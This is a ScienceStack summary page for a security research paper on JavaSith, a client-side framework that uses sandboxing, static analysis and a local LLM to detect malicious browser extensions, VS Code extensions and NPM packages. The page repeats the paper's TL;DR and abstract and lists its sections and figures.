Logo
ScienceStack
Table of Contents
Fetching ...
Sign In

JavaSith: A Client-Side Framework for Analyzing Potentially Malicious Extensions in Browsers, VS Code, and NPM Packages

Avihay Cohen

TL;DR

JavaSith tackles the rising risk of malicious code hidden in trusted extension ecosystems by delivering a client-side framework that performs end-to-end analysis of browser extensions, VSCode extensions, and NPM packages. It combines a fully in-browser runtime sandbox with time-accelerated execution, static analysis (including Retire.js-based vulnerability checks and heuristic pattern detection), and an on-device WebLLM that interprets findings and metadata. The system also includes a GUI for interactive review and provides case studies showing detection of cookie theft, cryptomining payloads, and information exfiltration, all while preserving user privacy by avoiding cloud-based analysis. Collectively, JavaSith demonstrates that a multi-technique, client-side approach can effectively reveal stealthy malicious behaviors that often bypass traditional defenses, offering a practical tool for developers and enterprises to vet extensions before trust is granted.

Abstract

Modern software supply chains face an increasing threat from malicious code hidden in trusted components such as browser extensions, IDE extensions, and open-source packages. This paper introduces JavaSith, a novel client-side framework for analyzing potentially malicious extensions in web browsers, Visual Studio Code (VSCode), and Node's NPM packages. JavaSith combines a runtime sandbox that emulates browser/Node.js extension APIs (with a ``time machine'' to accelerate time-based triggers) with static analysis and a local large language model (LLM) to assess risk from code and metadata. We present the design and architecture of JavaSith, including techniques for intercepting extension behavior over simulated time and extracting suspicious patterns. Through case studies on real-world attacks (such as a supply-chain compromise of a Chrome extension and malicious VSCode extensions installing cryptominers), we demonstrate how JavaSith can catch stealthy malicious behaviors that evade traditional detection. We evaluate the framework's effectiveness and discuss its limitations and future enhancements. JavaSith's client-side approach empowers end-users/organizations to vet extensions and packages before trustingly integrating them into their environments.

JavaSith: A Client-Side Framework for Analyzing Potentially Malicious Extensions in Browsers, VS Code, and NPM Packages

TL;DR

JavaSith tackles the rising risk of malicious code hidden in trusted extension ecosystems by delivering a client-side framework that performs end-to-end analysis of browser extensions, VSCode extensions, and NPM packages. It combines a fully in-browser runtime sandbox with time-accelerated execution, static analysis (including Retire.js-based vulnerability checks and heuristic pattern detection), and an on-device WebLLM that interprets findings and metadata. The system also includes a GUI for interactive review and provides case studies showing detection of cookie theft, cryptomining payloads, and information exfiltration, all while preserving user privacy by avoiding cloud-based analysis. Collectively, JavaSith demonstrates that a multi-technique, client-side approach can effectively reveal stealthy malicious behaviors that often bypass traditional defenses, offering a practical tool for developers and enterprises to vet extensions before trust is granted.

Abstract

Modern software supply chains face an increasing threat from malicious code hidden in trusted components such as browser extensions, IDE extensions, and open-source packages. This paper introduces JavaSith, a novel client-side framework for analyzing potentially malicious extensions in web browsers, Visual Studio Code (VSCode), and Node's NPM packages. JavaSith combines a runtime sandbox that emulates browser/Node.js extension APIs (with a ``time machine'' to accelerate time-based triggers) with static analysis and a local large language model (LLM) to assess risk from code and metadata. We present the design and architecture of JavaSith, including techniques for intercepting extension behavior over simulated time and extracting suspicious patterns. Through case studies on real-world attacks (such as a supply-chain compromise of a Chrome extension and malicious VSCode extensions installing cryptominers), we demonstrate how JavaSith can catch stealthy malicious behaviors that evade traditional detection. We evaluate the framework's effectiveness and discuss its limitations and future enhancements. JavaSith's client-side approach empowers end-users/organizations to vet extensions and packages before trustingly integrating them into their environments.

Paper Structure

This paper contains 31 sections, 3 figures.

Table of Contents

  1. Introduction
  2. Background and Motivation
  3. Extension Architecture and Security Model
  4. Threats and Notable Incidents
  5. Related Work
  6. Design and Architecture of JavaSith
  7. Emulated Runtime Sandbox
  8. Time Machine Module
  9. Static Analysis Engine
  10. Dependency and Vulnerability Scanning:
  11. Heuristic Pattern Analysis:
  12. Privacy Policy and Metadata Check:
  13. WebLLM-Based Risk Analyzer
  14. Graphical User Interface (GUI)
  15. Technical Implementation
  16. ...and 16 more sections

Figures (3)

  • Figure 1: High-level architecture of JavaSith. The framework ingests extension or package code, then performs static analysis, dynamic execution in a sandbox (with time simulation), and LLM-based evaluation. A GUI allows the user to review detailed findings.
  • Figure 2: High-level architecture of JavaSith Novel Sandbox.
  • Figure 10: LLM Analysis Tab